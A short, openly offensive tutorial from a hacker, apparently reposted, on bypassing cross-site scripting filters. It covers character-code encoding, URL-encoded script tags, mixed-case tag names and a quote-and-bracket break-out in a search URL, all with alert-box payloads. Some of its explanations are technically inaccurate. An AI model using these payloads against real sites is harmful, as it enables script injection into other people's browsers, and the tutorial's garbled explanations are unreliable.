Bypass XSS filters (Paper) ############################################# #Title : XSS, how to bypass filters # #Author : k3nz0 # #Contact : o9p@hotmail.fr # #Category : Papers # #Website : k3nz0.com # ############################################# #################Tunisian#################### ##################Hacker##################### #############################################
This lessons is devided into 3 parts : [1] Introduction [2] Types of filters [3] Conclusion
[1] Introduction : Nowadays, most of "securised" websites, make filters to dont allow cross site scripting "injections", however, we can bypass these filters by using the methods shown below :)
[2] Types of filters : We will learn, how to bypass these xss filters : [+]Bypass magic_quotes_gpc (if its on ) [+]Bypass with cryption in full html [+]Bypass with Obfuscation [+]Bypass with trying around method
############################################ [+]Bypass magic_quotes_gpc
When magic_quotes_gpc is on, it means that the server doesnt allow, ", / and (it depends) to bypass it we use : String.fromCharCode() We write our code, in the () crypted in ASCII exemple : String.fromCharCode(107, 51, 110, 122, 48) (Here I crypted k3nz0 in ascii : 107, 51, 110, 122, 48 And we use it : <script>String.fromCharCode(107, 51, 110, 122, 48)</script> We will see : k3nz0 We bypassed magic_quotes_gpc :)
#############################################
[+] Bypass with cryption in full html :
Very simple, we have to encode our code in full HTTP! Our code : <script>alert(i am here)</script> And in full HTTP : %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%69%20%61%6D%20%68%65%72%65%27%29%3C%2F%73%63%72%69%70%74%3E
Now, you can inject it :) ! Notice that you can use the tool "Coder" to do encode it in full HTTP We bypassed filter.
#############################################
[+] Bypass with Obfuscation :
Very simple too, this filter, dont allows for exemple these words : -script -alert
To bypass it, you change "script" with for exemple "sCriPt", and "alert" with "ALerT" ! For exemple : <ScriPt>ALeRt("i am here")</scriPt> We bypassed the filter. ##############################################
[+] Bypass with trying around method :
Generally, it is in the searchs scripts, we just add "> at the begining to close current fields : exemple : alert("hello") http://target.com/search.php?search="><script>alert("hello")</script >
We bypassed the filter.
###############################################
[3] Conclusion :
It was, how we can bypass xss filters, and how to inject our code :) This lesson is explained by k3nz0 Thank you for reading
GREETZ : ALLAH ! Aymanos, v1r, kannibal615 , born to kill, & more..
################################################© Offensive Security 2010
查看更多关于Bypass XSS filters (Paper) - 网站安全 - 自学php的详细内容...